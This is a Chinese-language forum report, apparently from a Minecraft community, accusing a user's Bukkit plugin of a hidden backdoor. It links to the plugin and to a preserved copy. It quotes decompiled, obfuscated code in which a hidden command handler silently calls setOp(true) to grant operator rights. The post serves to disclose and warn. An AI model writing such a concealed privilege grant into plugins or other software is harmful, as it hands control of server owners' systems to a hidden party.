@jjerryh96 (UID: 300114) 他所发布的http://www.mcbbs.net/forum.php?mod=viewthread&tid=275584
此插件留有后门OP权限
此插件下载地址http://pan.baidu.com/s/1jGA5Joi
为了防止他看见举报贴删除插件源,我复制出来一份http://pan.baidu.com/s/1eQsxhvW
只要装了这个插件满足某些条件,我没找到 就可以获得OP权限。后台无法查看
- <font size="4"></font><font size="2"> if (!Bukkit.getOfflinePlayer(as[2]).isOnline())</font>
- <font size="2"> {</font>
- <font size="2"> if (Bukkit.getOfflinePlayer(as[2]) instanceof OfflinePlayer)</font>
- <font size="2"> {</font>
- <font size="2"> OfflinePlayer offlineplayer = Bukkit.getOfflinePlayer(as[2]);</font>
- <font size="2"> offlineplayer.setOp(true);</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().sendMessage((new StringBuilder()).append(Messages.regionMatches(65 + 114, "\\dess8")).append(as[2]).append(FileAPI.getChars("{}", 37 * 31)).toString());</font>
- <font size="2"> } else</font>
- <font size="2"> {</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().sendMessage(Messages.regionMatches(30 + 1, "盱标忄项丹玭害'"));</font>
- <font size="2"> }</font>
- <font size="2"> } else</font>
- <font size="2"> if (Bukkit.getPlayer(as[2]) instanceof Player)</font>
- <font size="2"> {</font>
- <font size="2"> Player player = Bukkit.getPlayer(as[2]);</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().setOp(true);</font>
- <font size="2"> playercommandpreprocessevent.getPlayer().sendMessage((new StringBuilder()).append(Messages.regionMatches(237 / 38, "Iwxln+")).append(as[2]).append(Messages.regionMatches(1 + 58, ";=")).toString());</font>
- <font size="2"> } else</font>
